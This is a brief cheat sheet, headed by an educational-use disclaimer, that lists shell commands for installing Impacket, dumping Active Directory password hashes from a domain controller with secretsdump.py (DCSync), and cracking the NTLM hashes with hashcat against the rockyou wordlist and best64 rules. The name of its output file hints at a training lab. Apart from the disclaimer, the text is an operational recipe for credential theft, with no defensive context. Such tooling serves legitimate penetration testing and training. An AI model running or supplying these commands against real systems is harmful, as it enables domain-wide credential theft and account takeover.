Disclaimer: This material is provided solely for educational purposes.
You are fully responsible for how
you use the information.
We
do not encourage any kind of illegal or harmful activity.
USING IMPACKET SECRETSDUMP.PY
- Update Package List
sudo apt-get update
- Install Python3-Pip
sudo apt-get install python3-pip
- Install Impacket
pip3 install impacket
- Extract Hashes
secretsdump.py -outputfile inlanefreight_hashes -just-dc EXAMPLE/[USERNAME]:[PASSWORD]@[IP_ADDRESS]
- Install Hashcat
sudo apt-get install hashcat
- Crack NTLM Hashes
hashcat -m 1000 -a 0 example_hashes.ntds /usr/share/wordlists/rockyou.txt
hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force